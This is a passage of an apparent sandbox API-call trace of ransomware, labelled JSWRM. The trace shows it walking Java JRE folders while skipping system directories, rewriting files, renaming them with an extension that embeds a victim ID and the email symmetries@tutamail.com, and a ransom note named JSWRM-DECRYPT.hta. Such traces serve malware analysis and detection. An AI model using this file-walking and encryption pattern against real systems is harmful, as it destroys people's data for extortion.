cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0070.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0070.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0070.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0070.787] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d87b92, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x20d87b92, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x20d87b92, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.787] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0070.788] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="profile.jfc", cAlternateFileName="")) returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2=".") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="..") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="...") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="windows") returned -1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="recovery") returned -1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="perflogs") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="documents and settings") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="$RECYCLE.BIN") returned 1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="system volume information") returned -1 [0070.788] lstrcmpiW (lpString1="profile.jfc", lpString2="msocache") returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profile.jfc", lpUsedDefaultChar=0x0) returned 11 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profile.jfc", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profile.jfc", lpUsedDefaultChar=0x0) returned 11 [0070.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0070.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0070.789] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.789] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20065) returned 1 [0070.789] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e60) returned 0x24e1e0 [0070.789] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x4e60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x4e60, lpOverlapped=0x0) returned 1 [0070.792] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.792] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x4e60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x4e60, lpOverlapped=0x0) returned 1 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.792] CloseHandle (hObject=0x458) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0070.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0070.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.792] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\profile.jfc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0070.795] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="profile.jfc", cAlternateFileName="")) returned 0 [0070.795] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0070.795] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2=".") returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="..") returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="...") returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="windows") returned -1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="recovery") returned -1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="perflogs") returned -1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="documents and settings") returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="system volume information") returned -1 [0070.795] lstrcmpiW (lpString1="jfr.jar", lpString2="msocache") returned -1 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfr.jar", lpUsedDefaultChar=0x0) returned 7 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfr.jar", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfr.jar", lpUsedDefaultChar=0x0) returned 7 [0070.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0070.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0070.795] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.796] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=560581) returned 1 [0070.796] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0070.796] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0070.810] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.810] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.811] CloseHandle (hObject=0x454) returned 1 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0070.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0070.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0070.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.811] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0070.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0070.812] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x848c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jfxswt.jar", cAlternateFileName="")) returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2=".") returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="..") returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="...") returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="windows") returned -1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="recovery") returned -1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="perflogs") returned -1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="documents and settings") returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="system volume information") returned -1 [0070.812] lstrcmpiW (lpString1="jfxswt.jar", lpString2="msocache") returned -1 [0070.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0070.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxswt.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxswt.jar", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxswt.jar", lpUsedDefaultChar=0x0) returned 10 [0070.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0070.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxswt.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxswt.jar", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxswt.jar", lpUsedDefaultChar=0x0) returned 10 [0070.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0070.813] HeapFree (in: 